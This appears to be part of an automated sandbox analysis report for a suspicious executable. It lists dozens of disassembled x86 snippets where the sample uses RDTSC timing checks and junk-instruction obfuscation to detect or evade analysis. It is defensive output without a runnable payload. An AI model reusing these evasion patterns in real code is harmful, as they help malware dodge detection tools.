                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CE3 second address: 364CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CE8 second address: 364CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CF1 second address: 364CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CF7 second address: 364CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36BFFC second address: 36C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C000 second address: 36C004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C746 second address: 36C769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4688C929E9h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8CA second address: 36C8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4688C1B778h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8DA second address: 36C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8EE second address: 36C8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36C8F4 second address: 36C916 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jnl 00007F4688C929D6h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F4688C929D6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DCD4 second address: 36DCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DCD8 second address: 36DCE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DF63 second address: 36DF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36DF67 second address: 36DF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E068 second address: 36E086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B771h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E5C7 second address: 36E5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E80C second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36E9F9 second address: 36E9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F05E second address: 36F068 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F987 second address: 36F9A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9A2 second address: 36F9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9A8 second address: 36F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36F9AC second address: 36F9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F19 second address: 371F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4688C929E2h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F31 second address: 371F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F56 second address: 371F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371F60 second address: 371F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371D10 second address: 371D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 371D16 second address: 371D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 373578 second address: 37359E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C929E4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F4688C929DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37359E second address: 3735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37578E second address: 375796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3727FB second address: 3727FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 375796 second address: 3757A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3732DF second address: 3732E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3757A4 second address: 3757A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3732E5 second address: 3732EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA49 second address: 37AA4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA4E second address: 37AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B778h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AA73 second address: 37AA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37AF93 second address: 37AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4688C1B768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3A74h] 0x0000002a push 00000000h 0x0000002c mov di, cx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F4688C1B776h 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37BDEC second address: 37BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F4688C929EAh 0x0000000c pushad 0x0000000d jmp 00007F4688C929DCh 0x00000012 jnc 00007F4688C929D6h 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D38AEh], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4688C929D8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov bx, di 0x00000040 push 00000000h 0x00000042 or edi, 539C45E0h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37B149 second address: 37B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37BE4C second address: 37BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37B14E second address: 37B153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37BF9C second address: 37BFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4688C929D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37D103 second address: 37D10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37DFD9 second address: 37E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4688C929E9h 0x0000000d jg 00007F4688C929D8h 0x00000013 popad 0x00000014 nop 0x00000015 or dword ptr [ebp+122D2828h], edx 0x0000001b mov bh, E6h 0x0000001d push 00000000h 0x0000001f jnc 00007F4688C929DCh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4688C929D8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 movsx edi, si 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pop edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37F02F second address: 37F035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37F035 second address: 37F04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 38240F second address: 382441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4688C1B76Fh 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F4688C1B766h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 382441 second address: 38246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 383A60 second address: 383A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 384BE6 second address: 384BEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 383C89 second address: 383C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 385CC7 second address: 385D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4688C929E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F4688C929D6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 384E1C second address: 384EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F4688C1B768h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F4688C1B768h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c adc bl, FFFFFFE6h 0x0000004f mov eax, dword ptr [ebp+122D0995h] 0x00000055 stc 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4688C1B778h 0x0000005d jmp 00007F4688C1B76Ah 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jng 00007F4688C1B766h 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 386CB6 second address: 386CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 388AB0 second address: 388AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4688C1B768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xor ebx, 5F64974Fh 0x00000029 push 00000000h 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12454D8Eh], edi 0x00000036 mov edi, 719258C0h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 389B5D second address: 389B73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f je 00007F4688C929D6h 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 385E9F second address: 385F40 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c or dword ptr [ebp+12449AABh], ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007F4688C1B775h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F4688C1B768h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov bx, 70B8h 0x00000043 mov eax, dword ptr [ebp+122D06B1h] 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4688C1B768h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push FFFFFFFFh 0x00000065 or dword ptr [ebp+12461125h], ebx 0x0000006b mov edi, dword ptr [ebp+122D3ACCh] 0x00000071 push eax 0x00000072 pushad 0x00000073 push edi 0x00000074 ja 00007F4688C1B766h 0x0000007a pop edi 0x0000007b push eax 0x0000007c push edx 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 389CE0 second address: 389CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 389CE6 second address: 389CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 38C88B second address: 38C895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4688C929D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 389CFE second address: 389D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 38C895 second address: 38C901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3628h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4688C929D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, 1DB538E4h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F4688C929D8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f jo 00007F4688C929E4h 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007F4688C929D6h 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 38ABFC second address: 38AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32C010 second address: 32C01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32C01D second address: 32C023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32C023 second address: 32C037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32C037 second address: 32C03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 393861 second address: 393865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 39399C second address: 3939B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939B4 second address: 3939C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4688C929DAh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939C6 second address: 3939CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939CC second address: 3939D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939D2 second address: 3939D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
